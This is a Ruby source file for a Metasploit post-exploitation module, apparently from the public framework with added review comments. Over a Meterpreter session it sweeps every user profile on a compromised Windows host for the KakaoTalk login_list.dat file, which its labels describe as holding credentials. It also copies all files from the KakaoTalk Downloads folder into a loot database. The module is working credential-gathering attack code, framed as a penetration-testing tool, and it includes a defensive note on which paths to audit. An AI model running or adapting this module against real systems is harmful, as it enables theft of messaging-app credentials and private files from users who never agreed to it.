rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/kakaotalk.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
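# Metasploit post module that gathers KakaoTalk artifacts from the user
# profiles of a Windows host over a Meterpreter session.
#
# The class carries no collection logic of its own: it declares what to look
# for in ARTIFACTS and passes each profile to +run_packrat+, which comes from
# the Msf::Post::Windows::Packrat mixin (not shown in this file).
#
# Defensive note: the only locations this module is configured to read are
# +login_list.dat+ in the per-user +Kakao+ application-data folder and the
# contents of the +KakaoTalk Downloads+ documents folder. Those two paths are
# therefore the ones worth covering with file-access auditing and with
# restrictive ACLs on shared or multi-user hosts.
class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Declarative description of the artifacts to collect. The keys are
  # presumably interpreted by the Packrat mixin; confirm their exact meaning
  # against that mixin, which is outside this file.
  ARTIFACTS =
    {
      application: 'Kakao',
      app_category: 'chats',
      gatherable_artifacts: [
        {
          # Stored login list of the desktop client.
          filetypes: 'logins',
          path: 'LocalAppData',
          dir: 'Kakao',
          artifact_file_name: 'login_list.dat',
          description: 'The email address used for login',
          credential_type: 'text',
          regex_search: [
            {
              # NOTE(review): the label mentions usernames and passwords, but
              # the artifact description above only promises an e-mail
              # address; what the file really holds cannot be told from here.
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
              extraction_type: 'credentials',
              regex: [
                # Case-insensitive, single-line: the literal "login_list"
                # followed by the rest of that line.
                '(?i-mx:login_list.*)'
              ]
            }
          ]
        },
        {
          # Wildcard file name: every file in the folder is selected, so the
          # amount of data collected is bounded only by the folder's contents.
          filetypes: 'files',
          path: 'MyDocs',
          dir: 'KakaoTalk Downloads',
          artifact_file_name: '*',
          description: 'Files that were downloaded to the host machine'
        }
      ]
    }.freeze

  # Registers the module metadata and its user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'KakaoTalk Credential Gatherer',
        'Description' => %q{
          This module searches for KakaoTalk credentials on a Windows host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          # NOTE(review): declared empty; nothing in this file writes to the
          # target, but what run_packrat does there is not visible here.
          'SideEffects' => []
        }
      )
    )

    # The selectable artifact types are derived from the ARTIFACTS constant
    # defined above, with 'All' placed first as the default choice.
    artifact_types = ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')

    register_options(
      [
        # REGEX is registered here but never read in this file; whether the
        # Packrat mixin consults it should be confirmed there.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_types])
      ]
    )
  end

  # Prints the active selections, then runs the Packrat collection once for
  # every user profile returned by +grab_user_profiles+.
  #
  # @return [void]
  def run
    print_status('Filtering based on these selections: ')
    # capitalize only changes how the choice is displayed.
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One pass per user profile on the remote host, all with the same
    # artifact definition.
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status('PackRat credential sweep completed')
  end
end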